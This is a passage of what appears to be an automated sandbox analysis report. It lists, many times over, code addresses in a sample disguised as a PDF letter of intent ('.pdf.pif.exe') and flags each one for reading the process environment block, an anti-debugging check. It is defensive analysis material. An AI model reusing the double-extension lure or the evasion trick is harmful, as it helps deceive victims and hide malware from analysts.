            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F951ED mov eax, dword ptr fs:[00000030h]2_2_32F951ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCD1D0 mov eax, dword ptr fs:[00000030h]2_2_32FCD1D0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCD1D0 mov ecx, dword ptr fs:[00000030h]2_2_32FCD1D0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305903E mov eax, dword ptr fs:[00000030h]2_2_3305903E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305903E mov eax, dword ptr fs:[00000030h]2_2_3305903E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305903E mov eax, dword ptr fs:[00000030h]2_2_3305903E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305903E mov eax, dword ptr fs:[00000030h]2_2_3305903E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAB1B0 mov eax, dword ptr fs:[00000030h]2_2_32FAB1B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303705E mov ebx, dword ptr fs:[00000030h]2_2_3303705E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303705E mov eax, dword ptr fs:[00000030h]2_2_3303705E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33065060 mov eax, dword ptr fs:[00000030h]2_2_33065060
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FE7190 mov eax, dword ptr fs:[00000030h]2_2_32FE7190
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301106E mov eax, dword ptr fs:[00000030h]2_2_3301106E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300D070 mov ecx, dword ptr fs:[00000030h]2_2_3300D070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301D080 mov eax, dword ptr fs:[00000030h]2_2_3301D080
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301D080 mov eax, dword ptr fs:[00000030h]2_2_3301D080
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F97152 mov eax, dword ptr fs:[00000030h]2_2_32F97152
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89148 mov eax, dword ptr fs:[00000030h]2_2_32F89148
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89148 mov eax, dword ptr fs:[00000030h]2_2_32F89148
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89148 mov eax, dword ptr fs:[00000030h]2_2_32F89148
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89148 mov eax, dword ptr fs:[00000030h]2_2_32F89148
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300D0C0 mov eax, dword ptr fs:[00000030h]2_2_3300D0C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300D0C0 mov eax, dword ptr fs:[00000030h]2_2_3300D0C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F91131 mov eax, dword ptr fs:[00000030h]2_2_32F91131
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F91131 mov eax, dword ptr fs:[00000030h]2_2_32F91131
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B136 mov eax, dword ptr fs:[00000030h]2_2_32F8B136
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B136 mov eax, dword ptr fs:[00000030h]2_2_32F8B136
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B136 mov eax, dword ptr fs:[00000030h]2_2_32F8B136
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B136 mov eax, dword ptr fs:[00000030h]2_2_32F8B136
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330650D9 mov eax, dword ptr fs:[00000030h]2_2_330650D9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBD6E0 mov eax, dword ptr fs:[00000030h]2_2_32FBD6E0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBD6E0 mov eax, dword ptr fs:[00000030h]2_2_32FBD6E0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F72E mov eax, dword ptr fs:[00000030h]2_2_3304F72E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305972B mov eax, dword ptr fs:[00000030h]2_2_3305972B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC16CF mov eax, dword ptr fs:[00000030h]2_2_32FC16CF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306B73C mov eax, dword ptr fs:[00000030h]2_2_3306B73C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306B73C mov eax, dword ptr fs:[00000030h]2_2_3306B73C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306B73C mov eax, dword ptr fs:[00000030h]2_2_3306B73C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306B73C mov eax, dword ptr fs:[00000030h]2_2_3306B73C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F876B2 mov eax, dword ptr fs:[00000030h]2_2_32F876B2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F876B2 mov eax, dword ptr fs:[00000030h]2_2_32F876B2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F876B2 mov eax, dword ptr fs:[00000030h]2_2_32F876B2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33063749 mov eax, dword ptr fs:[00000030h]2_2_33063749
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8D6AA mov eax, dword ptr fs:[00000030h]2_2_32F8D6AA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8D6AA mov eax, dword ptr fs:[00000030h]2_2_32F8D6AA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303375F mov eax, dword ptr fs:[00000030h]2_2_3303375F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303375F mov eax, dword ptr fs:[00000030h]2_2_3303375F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303375F mov eax, dword ptr fs:[00000030h]2_2_3303375F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303375F mov eax, dword ptr fs:[00000030h]2_2_3303375F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303375F mov eax, dword ptr fs:[00000030h]2_2_3303375F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F78A mov eax, dword ptr fs:[00000030h]2_2_3304F78A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC9660 mov eax, dword ptr fs:[00000030h]2_2_32FC9660
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC9660 mov eax, dword ptr fs:[00000030h]2_2_32FC9660
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330197A9 mov eax, dword ptr fs:[00000030h]2_2_330197A9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301F7AF mov eax, dword ptr fs:[00000030h]2_2_3301F7AF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301F7AF mov eax, dword ptr fs:[00000030h]2_2_3301F7AF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301F7AF mov eax, dword ptr fs:[00000030h]2_2_3301F7AF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301F7AF mov eax, dword ptr fs:[00000030h]2_2_3301F7AF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301F7AF mov eax, dword ptr fs:[00000030h]2_2_3301F7AF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330637B6 mov eax, dword ptr fs:[00000030h]2_2_330637B6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304D7B0 mov eax, dword ptr fs:[00000030h]2_2_3304D7B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304D7B0 mov eax, dword ptr fs:[00000030h]2_2_3304D7B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F93616 mov eax, dword ptr fs:[00000030h]2_2_32F93616
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F93616 mov eax, dword ptr fs:[00000030h]2_2_32F93616
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC1607 mov eax, dword ptr fs:[00000030h]2_2_32FC1607
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCF603 mov eax, dword ptr fs:[00000030h]2_2_32FCF603
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9D7E0 mov ecx, dword ptr fs:[00000030h]2_2_32F9D7E0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33065636 mov eax, dword ptr fs:[00000030h]2_2_33065636
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F957C0 mov eax, dword ptr fs:[00000030h]2_2_32F957C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F957C0 mov eax, dword ptr fs:[00000030h]2_2_32F957C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F957C0 mov eax, dword ptr fs:[00000030h]2_2_32F957C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBD7B0 mov eax, dword ptr fs:[00000030h]2_2_32FBD7B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3302D660 mov eax, dword ptr fs:[00000030h]2_2_3302D660
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301368C mov eax, dword ptr fs:[00000030h]2_2_3301368C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301368C mov eax, dword ptr fs:[00000030h]2_2_3301368C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301368C mov eax, dword ptr fs:[00000030h]2_2_3301368C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301368C mov eax, dword ptr fs:[00000030h]2_2_3301368C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B765 mov eax, dword ptr fs:[00000030h]2_2_32F8B765
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B765 mov eax, dword ptr fs:[00000030h]2_2_32F8B765
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B765 mov eax, dword ptr fs:[00000030h]2_2_32F8B765
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B765 mov eax, dword ptr fs:[00000030h]2_2_32F8B765
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3740 mov eax, dword ptr fs:[00000030h]2_2_32FA3740
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3740 mov eax, dword ptr fs:[00000030h]2_2_32FA3740
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3740 mov eax, dword ptr fs:[00000030h]2_2_32FA3740
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9973A mov eax, dword ptr fs:[00000030h]2_2_32F9973A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9973A mov eax, dword ptr fs:[00000030h]2_2_32F9973A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F6C7 mov eax, dword ptr fs:[00000030h]2_2_3304F6C7
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89730 mov eax, dword ptr fs:[00000030h]2_2_32F89730
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89730 mov eax, dword ptr fs:[00000030h]2_2_32F89730
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC5734 mov eax, dword ptr fs:[00000030h]2_2_32FC5734
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330516CC mov eax, dword ptr fs:[00000030h]2_2_330516CC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330516CC mov eax, dword ptr fs:[00000030h]2_2_330516CC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330516CC mov eax, dword ptr fs:[00000030h]2_2_330516CC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330516CC mov eax, dword ptr fs:[00000030h]2_2_330516CC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F93720 mov eax, dword ptr fs:[00000030h]2_2_32F93720
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF720 mov eax, dword ptr fs:[00000030h]2_2_32FAF720
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF720 mov eax, dword ptr fs:[00000030h]2_2_32FAF720
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF720 mov eax, dword ptr fs:[00000030h]2_2_32FAF720
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCF71F mov eax, dword ptr fs:[00000030h]2_2_32FCF71F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCF71F mov eax, dword ptr fs:[00000030h]2_2_32FCF71F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330236EE mov eax, dword ptr fs:[00000030h]2_2_330236EE
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330236EE mov eax, dword ptr fs:[00000030h]2_2_330236EE
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330236EE mov eax, dword ptr fs:[00000030h]2_2_330236EE
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330236EE mov eax, dword ptr fs:[00000030h]2_2_330236EE
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330236EE mov eax, dword ptr fs:[00000030h]2_2_330236EE
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330236EE mov eax, dword ptr fs:[00000030h]2_2_330236EE
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304D6F0 mov eax, dword ptr fs:[00000030h]2_2_3304D6F0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F97703 mov eax, dword ptr fs:[00000030h]2_2_32F97703
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F95702 mov eax, dword ptr fs:[00000030h]2_2_32F95702
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F95702 mov eax, dword ptr fs:[00000030h]2_2_32F95702
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303F525 mov eax, dword ptr fs:[00000030h]2_2_3303F525
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303F525 mov eax, dword ptr fs:[00000030h]2_2_3303F525
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303F525 mov eax, dword ptr fs:[00000030h]2_2_3303F525
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303F525 mov eax, dword ptr fs:[00000030h]2_2_3303F525
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303F525 mov eax, dword ptr fs:[00000030h]2_2_3303F525
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303F525 mov eax, dword ptr fs:[00000030h]2_2_3303F525
